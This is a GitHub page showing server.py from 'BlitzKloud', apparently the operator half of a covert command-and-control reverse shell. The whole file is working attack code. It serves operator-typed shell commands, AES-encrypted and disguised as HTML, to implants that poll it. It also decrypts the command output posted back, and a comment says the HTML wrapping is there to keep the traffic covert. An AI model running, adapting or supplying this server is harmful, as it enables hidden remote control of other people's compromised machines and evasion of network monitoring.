-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathserver.py
151 lines (124 loc) · 4.02 KB
/
server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/env python3
# BlitzKloud Server - https://github.com/darkerego/blitzkloud
# darkerego, 2019 ~ xelectron@protonmail.com
import pyaes
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from time import sleep
from sys import stdin, argv
# from termios import tcgetattr, TCSADRAIN
# from tty import setraw, tcsetattr
# key must be bytes, so we convert it
key = b"This_key_for_demo_purposes_only!"
def enc(data):
"""
ENCRYPTION
AES CRT mode - 256 bit (32 byte) key
:param data: data to encrypt
:return: base64 wrapper AES encrypted data
"""
aes = pyaes.AESModeOfOperationCTR(key)
ciphertext = aes.encrypt(data)
encoded = base64.b64encode(ciphertext).decode()
# show the encrypted data
return encoded
def denc(data):
"""
DECRYPTION
AES CRT mode decryption requires a new instance be created
:param data: base64 encoded ciphertext
:return: plaintext
"""
aes = pyaes.AESModeOfOperationCTR(key)
# decrypted data is always binary, need to decode to plaintext
decoded = base64.b64decode(data)
decrypted = aes.decrypt(decoded).decode('utf-8')
return decrypted
command_history = []
class ShellServer(BaseHTTPRequestHandler):
"""
Class to define HTTP method logic
"""
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_headers()
cmds = command_history
# content_length = int(self.headers['Content-Length'])
try:
data = input('$ ')
except KeyboardInterrupt:
quit_now = input('Quit? (y/n/r/c)')
if quit_now == 'y':
exit(0)
elif quit_now == 'r':
print('Restarting server ...')
return False
elif quit_now == 'c':
print('Command history: ')
for cmd in cmds:
print(cmd)
else:
print('Waiting for reconnection ...')
return
else:
cmds.append(data)
data = enc(data)
content = ("<html><body><h1>%s</h1></body></html>" % data).encode()
try:
self.wfile.write(content)
except BrokenPipeError:
print('Broken Pipe, wait for reconnection ... ')
def do_HEAD(self):
self._set_headers()
def do_POST(self):
self._set_headers()
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length) # <--- Gets the data itself
post_data = str(post_data)
""" Strip out HTML wrapping (to make this shit covert)"""
_post_data = post_data.strip('<html><body><h1>')
_post_data = post_data.strip('</h1></body></html>')
res = denc(_post_data)
print(res)
return
def log_message(self, format, *args):
return
"""class _Getch: # History scrolling not yet implemented
# TODO: implement scrolling of command history OR full PTY shell
def __call__(self):
fd = stdin.fileno()
old_settings = tcgetattr(fd)
try:
setraw(stdin.fileno())
ch = stdin.read(3)
finally:
tcsetattr(fd, TCSADRAIN, old_settings)
return ch
def scroll():
# TODO: implement OR use a real PTY shell
inkey = _Getch()
while(1):
k = inkey()
if k != '':break
if k == '\x1b[A':
print("up")
elif k == '\x1b[B':
print("down")
else:
pass"""
def run(server_class=HTTPServer, handler_class=ShellServer, port=80):
server_address = ('0.0.0.0', port)
httpd = server_class(server_address, handler_class)
print('Starting httpd on %s:%d...' % (server_address, port))
while True:
httpd.serve_forever()
print('Restarting server ... ')
sleep(1)
if __name__ == "__main__":
if len(argv) == 2:
run(port=int(argv[1]))
else:
run(port=8880)